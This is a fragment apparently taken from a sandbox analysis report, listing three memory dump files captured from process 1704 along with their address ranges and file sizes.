memory/1704-10-0x000000001B510000-0x000000001B511000-memory.dmpFilesize
4KB
-
memory/1704-11-0x000000001C360000-0x000000001C361000-memory.dmpFilesize
4KB
-
memory/1704-5-0x000007FEF6000000-0x000007FEF69EC000-memory.dmpFilesize
9.9MB